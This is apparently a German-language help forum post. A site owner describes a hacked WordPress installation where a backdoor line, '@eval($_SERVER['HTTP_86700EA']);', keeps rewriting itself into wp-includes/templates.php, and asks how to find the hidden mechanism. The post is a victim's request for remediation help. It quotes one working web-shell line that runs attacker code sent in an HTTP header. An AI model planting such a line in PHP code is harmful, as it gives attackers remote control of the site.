Ich habe nun alle schadhaften Dateien entweder gelöscht oder mit Original-Dateien (Wordpress Core) ersetzt. Ich habe nur noch ein Problem, was mir Wordfence anzeigt. Und das ist folgendes:
Und zwar unter /web/wp-includes gibt es die Datei templates.php.
Hier schreibt sich immer ein Code rein, der auf einen externen Server zeigt. Die Code-Zeile lautet:
[INDENT]@eval($_SERVER['HTTP_86700EA']);
[/INDENT]
Hab danach gegooglet: Klarer Fall von Malware. Problem ist: Lösche ich diese Zeile, schreibt sich diese in 10 Sek wieder in das File. Wenn ich die Datei mit einer neuen, also Originaldatei ersetze das gleiche: Es schreibt sich wieder der Code in diese Datei. So wird es auch im Internet beschrieben. Heisst: Es gibt noch irgendeine Backdoor, die das zulässt bzw. veranlasst.
Und ich komme einfach nicht weiter, diese Backdoor zu finden.
Ich bin kurz vor dem Ziel, den Server komplett sauber zu haben, bzw. die Installation - nur noch das eine Ding.
Hat von euch einer eine Idee, wie ich hier weiterkomme und dem Ganzen ein Ende bereite?
Danke und Gruß
Marco